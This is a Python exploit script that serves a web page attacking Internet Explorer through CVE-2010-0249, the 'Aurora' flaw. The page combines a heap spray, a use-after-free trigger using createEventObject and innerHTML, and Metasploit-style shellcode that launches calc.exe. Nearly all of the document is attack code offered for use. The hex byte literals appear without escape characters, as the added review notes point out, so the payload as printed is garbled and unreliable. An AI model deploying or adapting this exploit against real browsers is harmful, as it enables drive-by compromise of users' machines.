
# Title : Internet Explorer Aurora Exploit
# Published : 2010-01-17
# Author : Ahmed Obied


#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   This program acts as a web server that generates an exploit to 
#   target a vulnerability (CVE-2010-0249) in Internet Explorer. 
#   The exploit was tested using Internet Explorer 6 on Windows XP SP2. 
#   The exploit's payload spawns the calculator. 
#
#   Usage  : python ie_aurora.py [port number]
#   
 
import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
        
class RequestHandler(BaseHTTPRequestHandler):
    """HTTP handler that serves the CVE-2010-0249 page described in the file header.

    Only two paths are answered: ``/`` returns the HTML/JavaScript document
    built by ``get_exploit`` as ``text/html``, and ``/aurora.gif`` returns the
    literal from ``get_image`` as ``image/gif``.  For any other path no
    response is sent.  The base class's per-request logging is suppressed;
    progress messages go to stdout instead.

    NOTE(review): the hex literals in ``get_payload`` and ``get_image`` appear
    here without escape sequences, so as listed they are plain ASCII text
    rather than the bytes the surrounding comments describe.
    """

    def convert_to_utf16(self, payload):
        """Encode *payload* as a JavaScript ``%uXXXX`` escape string.

        Consecutive character pairs are packed little-endian (the first
        character is the low byte) into one 16-bit code unit each, in the
        form ``unescape()`` expects on the served page.  A payload of odd
        length raises ``IndexError`` on its final, unpaired character.
        """
        units = []
        for idx in range(0, len(payload), 2):
            low = ord(payload[idx]) & 0xff
            high = ord(payload[idx + 1]) & 0xff
            units.append('%%u%04x' % (low | (high << 8)))
        return ''.join(units)

    def get_payload(self):
        """Return the stage literal below, encoded with ``convert_to_utf16``.

        The inline comment attributes the literal to the metasploit
        ``win32_exec`` module (``CMD=calc.exe``, 164 bytes, PexFnstenvSub).
        """
        # win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
        # http://metasploit.com
        pieces = (
            'x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73',
            'x13x6fx02xb1x0ex83xebxfcxe2xf4x93xeaxf5x0e',
            'x6fx02x3ax4bx53x89xcdx0bx17x03x5ex85x20x1a',
            'x3ax51x4fx03x5ax47xe4x36x3ax0fx81x33x71x97',
            'xc3x86x71x7ax68xc3x7bx03x6exc0x5axfax54x56',
            'x95x0ax1axe7x3ax51x4bx03x5ax68xe4x0exfax85',
            'x30x1exb0xe5xe4x1ex3ax0fx84x8bxedx2ax6bxc1',
            'x80xcex0bx89xf1x3exeaxc2xc9x02xe4x42xbdx85',
            'x1fx1ex1cx85x07x0ax5ax07xe4x82x01x0ex6fx02',
            'x3ax66x53x5dx80xf8x0fx54x38xf6xecxc2xcax5e',
            'x07x7cx69xecx1cx6ax29xf0xe5x0cxe6xf1x88x61',
            'xd0x62x0cx2cxd4x76x0ax02xb1x0e',
        )
        return self.convert_to_utf16(''.join(pieces))

    def get_exploit(self):
        """Return the HTML document served at ``/`` with its placeholders filled in.

        ``<PAYLOAD>`` is replaced by ``get_payload()`` and ``<NOP>`` by the
        ``%u0a0a%u0a0a`` filler that ``spray_heap`` repeats up to 0x80000
        characters for each of 200 chunks.  The script only runs when
        ``navigator.userAgent`` contains ``MSIE``; any other browser is sent
        to ``about:blank``.  The ``onload`` of ``aurora.gif`` is what calls
        ``ev1``, which in turn schedules ``ev2`` on a 1 ms interval.
        """
        template = '''
        <html>
        <head>
            <script>
            
            var obj, event_obj;
            
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
            
                chunk_size = 0x80000;
                payload = unescape("<PAYLOAD>");
                nopsled = unescape("<NOP>");
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (payload.length + 20);        
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks[i] = nopsled + payload;
            }
        
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj[i] = document.createElement("COMMENT");
            }
        
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
      
            function ev2()
            {
                var data, tmp;
                
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj[i].data = data;
                }
                event_obj.srcElement;
            }
                    
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true;   
            }
            
            if (check()) {
                initialize();
                spray_heap();               
            }
            else
                window.location = 'about:blank'
                
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="aurora.gif" onload="ev1(event)">
            </span>        
        </body>
        </html>
        '''
        page = template.replace('<PAYLOAD>', self.get_payload())
        return page.replace('<NOP>', '%u0a0a%u0a0a')

    def get_image(self):
        """Return the body served for ``/aurora.gif``.

        NOTE(review): as listed the literal is plain ASCII text, not GIF
        bytes, even though it is sent with ``Content-Type: image/gif``.
        """
        pieces = (
            'x47x49x46x38x39x61x01x00x01x00x80x00x00xffxffxff',
            'x00x00x00x2cx00x00x00x00x01x00x01x00x00x02x02x44',
            'x01x00x3b',
        )
        return ''.join(pieces)

    def log_request(self, *args, **kwargs):
        """Suppress the base class's default request logging."""
        return None

    def do_GET(self):
        """Serve ``/`` and ``/aurora.gif``; send nothing for any other path.

        Any exception raised while handling a request -- including a client
        disconnecting mid-write -- prints an error and terminates the whole
        process with status -1, so one bad request stops the server.
        """
        try:
            if self.path == '/':
                self._serve_page()
            elif self.path == '/aurora.gif':
                self._serve_image()
        except BaseException:
            # Catches everything, KeyboardInterrupt included, before exiting.
            print('[*] Error : an error has occured while serving the HTTP request')
            print('[-] Exiting ...')
            sys.exit(-1)

    def _serve_page(self):
        """Send ``get_exploit()`` as ``text/html`` with progress messages on stdout."""
        peer = self.client_address[0]
        print('')
        print('[-] Incoming connection from %s' % peer)
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        self.end_headers()
        print('[-] Sending exploit to %s ...' % peer)
        self.wfile.write(self.get_exploit())
        print('[-] Exploit sent to %s' % peer)

    def _serve_image(self):
        """Send ``get_image()`` as ``image/gif``."""
        self.send_response(200)
        self.send_header('Content-Type', 'image/gif')
        self.end_headers()
        self.wfile.write(self.get_image())
                       
def _parse_port(arg):
    """Return *arg* as an int in 1024..65535; raise ``ValueError`` otherwise."""
    port = int(arg)
    if not 1024 <= port <= 65535:
        raise ValueError
    return port


def _serve(port):
    """Bind ``HTTPServer`` on all interfaces at *port* and serve until stopped.

    A ``socket.error`` while binding or resolving the local hostname is
    reported and swallowed.  Whatever stops ``serve_forever`` (typically an
    interrupt) is reported as an exit; the caller decides the exit status.
    """
    try:
        server = HTTPServer(('', port), RequestHandler)
        local_ip = socket.gethostbyname(socket.gethostname())
        print('[-] Web server is running at http://%s:%d/' % (local_ip, port))
        try:
            server.serve_forever()
        except BaseException:
            # Catch-all so an interrupt prints the exit line instead of a traceback.
            print('[-] Exiting ...')
    except socket.error:
        print('[*] Error : a socket error has occurred')


def main():
    """Command-line entry point: ``python ie_aurora.py [port number]``.

    Exits with status 0 on a usage error and with -1 once the server has
    stopped for any reason, or when the port argument is not an integer in
    1024..65535.
    """
    if len(sys.argv) != 2:
        print('Usage: %s [port number (between 1024 and 65535)]' % sys.argv[0])
        sys.exit(0)
    try:
        port = _parse_port(sys.argv[1])
        _serve(port)
        sys.exit(-1)
    except ValueError:
        print('[*] Error : an invalid port number was given')
        sys.exit(-1)
            
if __name__ == "__main__":
    # Only start the server when run as a script, not on import.
    main()